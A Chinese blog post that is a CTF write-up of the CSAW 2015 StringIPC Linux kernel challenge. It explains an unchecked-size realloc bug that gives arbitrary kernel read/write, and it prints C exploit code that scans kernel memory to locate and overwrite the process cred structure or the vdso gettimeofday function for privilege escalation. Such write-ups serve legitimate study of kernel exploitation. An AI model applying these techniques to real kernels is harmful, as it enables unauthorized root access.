linux kernal pwn CSAW-2015-StringIPC

最新推荐文章于 2024-03-08 16:43:51 发布
最新推荐文章于 2024-03-08 16:43:51 发布
阅读量194 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/123543814
版权

init脚本

qemu-system-x86_64 \
-m 256M \
-kernel ./arch/x86_64/boot/bzImage \
-initrd  ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet" \
-cpu qemu64,+smep,+smap \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-gdb tcp::1234 -S \
-nographic  -enable-kvm  \

开了smep smap

在这里插入图片描述
保护长这样
开了canary

直接分析stringipc.ko文件

先来看三个比较重要的结构体
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述就是申请channel

在这里插入图片描述
找到channel释放掉

在这里插入图片描述
看得出来是realloc

在这里插入图片描述
漏洞也在这里
没有对size检查

传入-1导致返回地址是0x10
然后size是-1导致可以写任意大小
导致我们可以任意写

利用方式也是有几种
首先是劫持cred结构体
就像2017 ciscn babydriver一样
我们劫持cred结构体之后就能实现提权

劫持cred结构体的核心是我们得先找到他
我们这里用的思想是

核心代码
这来自ha1vk大佬

    //通过prctl给当前进程的task结构设置一个标记,方便我们在内存中搜索时可以作为依据
    char *buf = (char *)calloc(1,0x1000);
    char target[16];
    strcpy(target,"abcdefghijklmn");
    prctl(PR_SET_NAME,target);
    initFD();
    int id = alloc_channel(0x100);
    shrink_channel(id,0x101);
    size_t cred_addr = -1;
    //task和cred结构的范围在0xffff880000000000~0xffffc80000000000
    for (size_t addr=0xffff880000000000;addr < 0xffffc80000000000;addr += 0x1000) {
        arbitrary_read(id,buf,addr,0x1000);
        //搜索当前读出的数据里是否有我们的标记
        size_t tag_ptr = memmem(buf, 0x1000,target,16);
        if (tag_ptr) {
            cred_addr = *(size_t *)(tag_ptr - 0x8);
            size_t real_cred_addr = *(size_t *)(tag_ptr - 0x10);
            if ((cred_addr & 0xff00000000000000) && cred_addr == real_cred_addr) {
                printf("[+] found cred_ptr at 0x%lx\n",addr + tag_ptr - (size_t)buf);
                printf("[+] cred_addr at 0x%lx\n",cred_addr);
                break;
         }
      }
   }

第二种方式是劫持vdso

一个道理
首先是找到vdso
这个利用的是gettimeofday里面的字符串

int get_gettimeofday_str_offset() {
    size_t vdso_addr = getauxval(AT_SYSINFO_EHDR);
    char* name = "gettimeofday";
    if (!vdso_addr){
        printf("[-]error get name's offset");
        return 0;
    }
    size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));
    if (name_addr < 0) {
        printf("[-]error get name's offset");
        return 0;
    }
    return name_addr - vdso_addr;
}

int main()
{
    char *buf = (char *)calloc(1,0x1000);
    char shellcode[]="";
    initFD();
    //构造漏洞
    int id = alloc_channel(0x100);
    if(id == -1){
        printf("[*]alloc error\n");
        exit(-1);
    }
    shrink_channel(id,0x101);
    size_t vdso_addr = -1;
    int gettimeofday_off = get_gettimeofday_str_offset();
    printf("[*]start searching...\n");
    for(size_t addr=0xffff880000000000;addr < 0xffffc80000000000;addr += 0x1000)
    {
        arbitrary_read(id,buf,addr,0x1000);
        if(!strcmp(buf+gettimeofday_off,"gettimeofday")){
            printf("[*]find vdso\n");
            vdso_addr = addr;
            printf("[*]vdso_addr:%lx\n",vdso_addr);
            break;
        }
    }
    size_t gettimeofday = vdso_addr + 0xcb0;
    arbitrary_write(id,shellcode,gettimeofday,strlen(shellcode));
    return 0;
}

然后改掉里面的函数
调一下

但是这法子没啥用了
能劫持vdso的核心就是vdso在内核状态下是可写的
然后2.x版本开始内核状态不能写了

第三种方法就是劫持prctl
这我们会在强网杯2018solid_core中仔细研究

yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux kernel --- dts的相关操作函数
栀子花蛋糕的博客
12-07 4738
linux kernel — dts以及相关of函数
Linux-Kernal-Exploits-m-:Linux内核漏洞
05-17
Linux内核漏洞简介Linux内核漏洞进攻清单#CVE#描述#内核 [glibc] (glibc <= 2.26) [Sudo] (须藤1.8.6p7-1.8.20) [由于UFO到非UFO路径切换而导致的内存损坏] [由BPF验证程序引起的内存损坏]( 之前Linux内核...
Linux kernel pwn --- CSAW2015 StringIPC
abelxu
03-21 294
0x01查看题目 1.launch.sh。 qemu-system-x86_64 \ -m 512 \ -kernel ./bzImage \ -initrd ./rootfs.cpio \ -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init" \ -nographic \ -s \ -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
CSAW-2015-StringIPC解法一修改cred结构
seaaseesa的博客
03-06 661
CSAW-2015-StringIPC 首先,查看一下启动脚本,发现没有开smap、smep、kaslr qemu-system-x86_64\ -m512\ -kernel./bzImage\ -initrd./rootfs.cpio\ -append"console=ttyS0root=/dev/ramrdini...
Jump into Linux kernal - CPU - (1)
YenZiHua的专栏
05-14 563
前一阵子,买了个日立的移动硬盘,然后下载了个VirtualBox和Debian-6.0.7,便想将VirtualBox安装在移动硬盘上,然后用VirtualBox跑Debian-6.0.7。但发现在安装的时候,还是在检测CD的那一步出了问题:报没有检测到。于是又下载了个Debian-7.0.0,一装就装上了。 于是,便看起了《Linux内核源代码情景分析》。写得非常好的一本书,很适合像我
linux kernal pwn 2018强网杯 solid_core
yongbaoii的博客
04-17 218
整个应该从CSAW 2015 stringipc来看 这道core看起来似乎跟上面那个stringipc是一模一样 但是总会有不同 区别就首先不让读写0xffffffff80000000往前的地址 这直接导致我们不能覆写cred 上次的第一个思路就没了 然后它又用的是最新的内核 新的内核中专门对劫持vdso的攻击手段 所以要介绍一个新的思路 劫持prctl函数,它能够让我们从局部地址读写一直到任意代码执行 prctl有5个参数,prctl将参数原封不动传给了security_task_prctl函数去处理
CTF-PWN-babydriver (linux kernel pwn+UAF)
SuperGate的博客
02-26 2396
第一次接触linux kernal pwn,和传统的pwn题区别较大,需要比较多的前置知识,以及这种题的环境搭建、运行和调试相关的知识。 文章目录Linux内核及内核模块Linux内核(Kernal)内核模块(LKM)iocltstruct credSLUB&SLAB内核态函数题目分析程序概述漏洞分析exp内核调试相关 Linux内核及内核模块 Linux内核(Kernal) 这里只对内...
关于Linux系统中的U-Boot、Kernel、RootFS
最新发布
smallerxuan的博客
03-08 1240
U-Boot、Kernel和 RootFS 是嵌入式Linux系统中的三个关键组成部分。可以说从事Linux系统相关的开发者,无论是在原厂、方案商、板卡商都离不开对这三个板块的理解、掌握、使用。
RISC-V Linux 启动流程分析
嵌入式Linux
07-18 2107
“Author: 通天塔 985400330@qq.comDate: 2022/05/15Revisor: lzufalcon falcon@tinylab.orgProject: RISC-V Linux 内核剖析”说明:RISC-V Linux 内核兴趣小组旨在围绕 RISC-V 处理器架构系统地研究 Linux 内核以及上下栈中的技术,为国内 RISC-V ...
学习linux-0.11内核——搭建环境(编译、调试bootsec)
jmhIcoding
09-14 2302
编译内核 获取内核代码 git clone https://github.com/jmhIcoding/linux_kernel12.git git checkout check 其中 linux_kernel12的目录结构为: · | |————source_code 原始linux-0.11代码,里面有vs2015的工程文件,可以方便的看代码 | |----source_co...
.Linux-4.9.88tar.bz2
08-22
linux kernal
Linux Kernal 核心中文手册
02-18
这份"Linux Kernal核心中文手册"是理解Linux内核工作原理的重要参考资料,尤其对于那些希望深入学习Linux系统的人来说,它是不可或缺的工具。 手册首先可能会介绍Linux内核的基本架构,包括内核启动过程,进程管理...
Linux kernal 核心中文手册
07-17
本手册《Linux kernal 核心中文手册》是深入理解Linux内核的重要参考资料,尤其对于Linux开发者和系统管理员来说,它提供了丰富的理论知识和实践指导。 1. **进程管理**:内核通过调度算法控制进程的执行,包括进程...
linux kernal 代码
10-21
linux kernal 的源码 方便想学习linux的同学下载使用
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8002
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 6980
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5821
尝试过很多解决方案之后无果 决定研究一下它的整个流程
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 5343
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
linux kernal
03-16
Linux内核是一个开源的操作系统内核,它是Linux操作系统的核心部分。它是由Linus Torvalds和其他开发人员开发的,它提供了操作系统的基本功能,如进程管理、内存管理、文件系统、网络协议等。Linux内核是一个高度可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值